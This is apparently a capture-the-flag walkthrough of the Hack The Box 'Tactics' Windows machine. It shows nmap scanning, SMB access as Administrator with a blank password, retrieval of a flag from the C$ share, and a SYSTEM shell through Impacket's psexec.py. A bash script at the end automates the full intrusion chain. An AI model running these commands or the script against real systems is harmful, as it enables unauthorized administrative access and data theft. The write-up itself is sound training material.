Tactics - Windows
- justinblawitz
- Oct 15, 2025
- 3 min read
Ping the target, then scan it with sudo nmap -sC -Pn {target Ip}. -sC runs nmap's default scripts against whatever it finds open, and -Pn treats the host as online and skips the host discovery phase, which is essentially a ping sweep (ICMP echo plus a couple of TCP probes). We skip it because Windows hosts usually run a firewall that drops ICMP, so without -Pn nmap would report the target as down and never scan its ports.

We find 3 open ports. Port 135/tcp runs msrpc, the Microsoft RPC endpoint mapper that lets Windows applications locate and call each other's services. RPC (remote procedure call) is a low-level form of inter-process communication where a client process makes requests of a server process, locally or on another host.
We also find port 139/tcp open running netbios-ssn, the NetBIOS session service. NetBIOS (network basic input/output system) lets applications on separate computers communicate over a local area network at the session layer of the OSI model, and on this port it carries SMB over NetBIOS.
The final open port, and the one we’ll be looking into, is 445/tcp running microsoft-ds, which is SMB directly over TCP. SMB (server message block) is the Windows file and printer sharing protocol; it listens on port 445 on modern systems, or on 139 when tunnelled over NetBIOS.
We can attempt to extract some information from SMB using the smbclient tool; if it isn't installed we can run sudo apt install smbclient, and then use smbclient -h or man smbclient to get a list of commands and flags. In this case we’ll run smbclient -L {target Ip} -U Administrator and press Enter at the password prompt, hoping the built-in Administrator account has been left with a blank password. -L lists the shares on the target Ip and -U specifies the username. The share list comes back, which confirms the blank password was accepted and we can authenticate to SMB as a local administrator.

On this machine there are two ways to take this further: connect to the C$ administrative share with smbclient as Administrator, or use psexec.py from Impacket to get a shell. We’ll go over the first method and then the second.
Using smbclient, we run smbclient \\\\{target Ip}\\C$ -U Administrator (the backslashes are doubled so the shell passes them through; smbclient //{target Ip}/C$ -U Administrator is equivalent) to connect to the C$ share, which is the root of the C: drive, and use dir to list its contents. A trailing $ hides a share from browse lists; C$ and ADMIN$ are the default administrative shares, which only members of the local Administrators group can open.

With access to the C$ share, we navigate to the Administrator's desktop with cd Users\Administrator\Desktop (smbclient also accepts forward slashes in remote paths) and download the flag with get flag.txt.

We can then exit smbclient and use cat flag.txt to read the downloaded file and capture the flag.

For the second method, we’ll use a tool called psexec.py to turn the same blank Administrator password into an interactive SYSTEM shell. It works by uploading a small service executable to a writable share (ADMIN$ by default) and starting it as a Windows service through the Service Control Manager, which is why the account needs local administrator rights rather than any flaw in the share itself. Psexec.py is part of the Impacket framework, a Python library for working with network protocols. Impacket focuses on low-level programmatic access to the packets and, for protocols like SMB, the protocol implementation itself. The tool is named after the PsExec utility from Microsoft’s Sysinternals suite since it gives us a fully interactive shell on remote Windows machines in the same way PsExec does.
To install Impacket we’ll first run git clone https://github.com/SecureAuthCorp/impacket.git (the project has since moved to fortra/impacket and the old URL redirects), change into the new directory with cd impacket, and install it with python3 -m pip install . so its dependencies are present. There is no single impacket command; each script in the examples directory takes -h, for example python3 examples/psexec.py -h.

We can then change to the examples directory in Impacket, which contains psexec.py, and run python3 psexec.py administrator@{target Ip}. The general syntax is python3 psexec.py [domain/]username[:password]@{target Ip}; when no password is given on the command line psexec.py prompts for one, and we press Enter to send a blank password (-no-pass skips the prompt entirely).

After running whoami we see nt authority\system, the highest privilege level on the machine: psexec.py's helper runs as a Windows service, and services started this way run as SYSTEM. From here we can browse the file system and read C:\Users\Administrator\Desktop\flag.txt to capture the flag again.
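The whole chain above, as an added example that is not part of the original post: a script that scans the target, works out which SMB port to use, tests the blank Administrator password, pulls the flag from C$, and runs one command through psexec.py. It assumes nmap, smbclient and Impacket's psexec.py are on PATH (pip installing Impacket provides psexec.py as a command), that the scan is saved to scan.gnmap, and that the target IP is passed as the first argument; the IP, share and flag path are placeholders from this walkthrough.

```bash
#!/usr/bin/env bash
# Added example, not from the original post: script the enumeration described
# above. Assumes nmap, smbclient and Impacket's psexec.py are on PATH and that
# the target IP is passed as the first argument (placeholder, not a real host).
set -eu

# Print the open TCP ports from an nmap grepable (-oG) scan read on stdin,
# one per line. The -oG format lists ports as "445/open/tcp//microsoft-ds///".
open_ports() {
    grep -o '[0-9]*/open/tcp' | cut -d/ -f1
}

# Read a port list on stdin and print the port to talk SMB on: 445 (SMB directly
# over TCP) is preferred, 139 (SMB over NetBIOS) is the fallback. Fails if neither.
smb_port() {
    local ports p
    ports=$(cat)
    for p in 445 139; do
        if printf '%s\n' "$ports" | grep -qx "$p"; then
            echo "$p"
            return 0
        fi
    done
    return 1
}

# Try to list shares as the given user with an empty password.
# -N suppresses the password prompt, so an empty password is sent.
# Exit status is smbclient's: 0 means the blank password was accepted.
list_shares_blank_password() {
    local ip=$1 port=$2 user=${3:-Administrator}
    smbclient -L "$ip" -p "$port" -U "$user" -N
}

# Download one file from a share non-interactively (-c runs smbclient commands).
# smbclient accepts forward slashes in remote paths, which avoids shell escaping.
fetch_from_share() {
    local ip=$1 port=$2 share=$3 remote_path=$4 user=${5:-Administrator}
    smbclient "//$ip/$share" -p "$port" -U "$user" -N -c "get $remote_path"
}

# Second method: run one command as SYSTEM through psexec.py. The
# "user:@host" form gives an empty password and -no-pass skips the prompt.
psexec_run() {
    local ip=$1 cmd=$2 user=${3:-Administrator}
    psexec.py -no-pass "$user:@$ip" "$cmd"
}

main() {
    local ip=${1:?usage: $0 <target-ip>} port
    nmap -sC -Pn -oG scan.gnmap "$ip" >/dev/null
    port=$(open_ports <scan.gnmap | smb_port) || { echo "no SMB port open on $ip" >&2; exit 1; }
    if list_shares_blank_password "$ip" "$port"; then
        fetch_from_share "$ip" "$port" 'C$' 'Users/Administrator/Desktop/flag.txt'
        cat flag.txt
        psexec_run "$ip" whoami
    fi
}

# Only run the network steps when a target was given; the helper functions
# above can be exercised on a saved scan without one.
if [ $# -gt 0 ]; then
    main "$@"
fi
```

The parsing helpers are kept separate from the network steps so they can be checked against a saved scan before pointing the script at a live host; smbclient's exit status is used as the password test because an empty password that is rejected makes -L fail rather than print anything.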
